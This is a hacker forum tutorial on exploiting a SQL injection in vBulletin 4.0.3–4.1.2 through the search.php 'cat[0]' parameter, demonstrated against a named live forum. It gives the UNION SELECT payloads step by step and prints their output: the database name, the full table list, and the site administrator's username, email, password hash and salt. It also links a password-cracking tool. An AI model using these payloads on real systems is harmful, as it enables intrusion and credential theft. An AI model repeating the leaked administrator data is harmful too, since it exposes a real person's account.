hello,
Okay untill yesterday this method was Private, but last day It got leaked , so too decided to make a tutorial because now it’s not worth in hiding this exploit for me, coz already some1 else leaked it =) si its given below
Code:
[cc lang=”html”]http://1337day.com/exploits/16147/[/cc]
okay =) so here we go.!
Let’s find our target , this exploit works on vbulletin version 4.0.3-4.1.2 =).

Let’s find our target ………
ok so i am gonna attack vBulletin version 4.1.2, but before we need HTTP Live Header =) Download that and install that plugin in your Mozilla firefox.
Code:
[cc lang=”html”]http://www.osculator.net/forum/[/cc]
I registered there with username : CrosS =)
ok i made a grouo with name -> osculator

I will search this group, while just Clicking group in search | and keyword giving it’s name i.e osculator <-- so before we Press Search Now < we will open our HTTP Live Header, and then we click search Now =) Code: [cc lang="html"]http://www.osculator.net/forum/search.php[/cc] so i found it Code: [cc lang="html"]http://www.osculator.net/forum/search.php?searchid=21631[/cc] Now, in HTTP live header, move the cursor at top and find the below code Code: [cc lang="php"]type%5B%5D=7&query=osculator&titleonly=1&searchuser=&exactname=1&tag=&dosearch=Search+Now&searchdate=0&beforeafter=after&sortby=relevance&order=descending&saveprefs=1&s=&securitytoken=1306043165-52b2f563c103e8c227b6322ab6b9d5066cb905e4&do=process&searchthreadid=[/cc] click it and Press REPLAY < in HTTP live Header, and new window opens. now, we put are Injection query, i.e after > process&searchthreadid= < put our injection, so it will look like Code: [cc lang="php"]process&searchthreadid=&cat[0]=1) UNION SELECT database()#[/cc] so we get Code: [cc lang="php"]Type: Groups; Keyword(s): osculator; : Uncategorized, osculatornet1[/cc] so now we put this code and it will look like Code: [cc lang="php"]&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#[/cc] Code: [cc lang="php"]process&searchthreadid=&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#[/cc] we get Code: [cc lang="sql"]Uncategorized, CHARACTER_SETS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, COLUMNS, COLUMN_PRIVILEGES, KEY_COLUMN_USAGE, PROFILING, ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, STATISTICS, TABLES, TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TRIGGERS, USER_PRIVILEGES, VIEWS, vb_access, vb_action, vb_ad, vb_adcriteria, vb_adminhelp, vb_administrator, vb_adminlog, vb_adminmessage, vb_adminutil, vb_album, vb_albumupdate, vb_announcement, vb_announcementread, vb_apiclient, vb_apilog, vb_attachment, vb_attachmentcategory, vb_attachmentcategoryuser, vb_attachmentpermission, vb_attachmenttype, vb_attachmentviews, vb_avatar, vb_bbcode, vb_bbcode_video, vb_block, vb_blockconfig, vb_blocktype, vb_bookmarksite, vb_cache, vb_cacheevent, vb_calendar, vb_calendarcustomfield, vb_calendarmoderator, vb_calendarpermission, vb_contentpriority, vb_contenttype, vb_cpsession, vb_cron, vb_cronlog, vb_customavatar, vb_customprofile, vb_customprofilepic, vb_datastore, vb_dbquery, vb_deletionlog, vb_discussion, vb_discussionread, vb_editlog, vb_event, vb_externalcache, vb_faq, vb_filedata, vb_forum, vb_forumpermission, vb_forumprefixset, vb_forumread, vb_groupmessage, vb_groupmessage_hash, vb_groupread, vb_holiday, vb_humanverify, vb_hvanswer, vb_hvquestion, vb_icon, vb_imagecategory, vb_imagecategorypermission, vb_impexerror, vb_indexqueue, vb_infraction, vb_infractionban, vb_infractiongroup, vb_infractionlevel, vb_language, vb_mailqueue, vb_moderation, vb_moderator, vb_moderatorlog, vb_notice, vb_noticecriteria, vb_noticedismissed, vb_package, vb_passwordhistory, vb_paymentapi, vb_paymentinfo, vb_paymenttransaction, vb_phrase, vb_phrasetype, vb_picturecomment, vb_picturecomment_hash, vb_picturelegacy, vb_plugin, vb_pm, vb_pmreceipt, vb_pmtext, vb_pmthrottle, vb_podcast, vb_podcastitem, vb_poll, vb_pollvote, vb_post, vb_postedithistory, vb_posthash, vb_postlog, vb_postparsed, vb_prefix, vb_prefixpermission, vb_prefixset, vb_product, vb_productcode, vb_productdependency, vb_profileblockprivacy, vb_profilefield, vb_profilefieldcategory, vb_profilevisitor, vb_ranks, vb_reminder, vb_reputation, vb_reputationlevel, vb_route, vb_rssfeed, vb_rsslog, vb_searchcore, vb_searchcore_text, vb_searchgroup, vb_searchgroup_text, vb_searchlog, vb_session, vb_setting, vb_settinggroup, vb_sigparsed, vb_sigpic, vb_skimlinks, vb_smilie, vb_socialgroup, vb_socialgroupcategory, vb_socialgroupicon, vb_socialgroupmember, vb_spamlog, vb_stats, vb_stopbotsregistry, vb_strikes, vb_style, vb_stylevar, vb_stylevardfn, vb_subscribediscussion, vb_subscribeevent, vb_subscribeforum, vb_subscribegroup, vb_subscribethread, vb_subscription, vb_subscriptionlog, vb_subscriptionpermission, vb_tachyforumcounter, vb_tachyforumpost, vb_tachythreadcounter, vb_tachythreadpost, vb_tag, vb_tagcontent, vb_tagsearch, vb_template, vb_templatehistory, vb_templatemerge, vb_thread, vb_threadrate, vb_threadread, vb_threadredirect, vb_threadviews, vb_upgradelog, vb_user, vb_useractivation, vb_userban, vb_userchangelog, vb_usercss, vb_usercsscache, vb_userfield, vb_usergroup, vb_usergroupleader, vb_usergrouprequest, vb_userlist, vb_usernote, vb_userpromotion, vb_usertextfield, vb_usertitle, vb_vbfields, vb_visitormessage, vb_visitormessage_hash vb_user [/cc] our injection >
Code:
[cc lang=”php”]&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM vb_user WHERE userid=1#[/cc]
so here we go =)

Code:
[cc lang=”php”]Type: Groups; Keyword(s): osculator; : Uncategorized, admin:camille@osculator.net:5aa9d2cbeb72cb7749ad615b5bed8f07:+.yh63c!~v9]U-<+8vw4:WO9r_Pt"[/cc] Video Code: http://www.youtube.com/watch?v=fR9RGCqIPkc
FOR CRACKING PASSWORD YOU CAN USE THIS TOOL:
Code:
http://www.insidepro.com/download/passwordspro.zip

Soruce,Author : CrosS | r00tw0rm.com

Warning: Do not use this on live, production sites. Educational purpose only.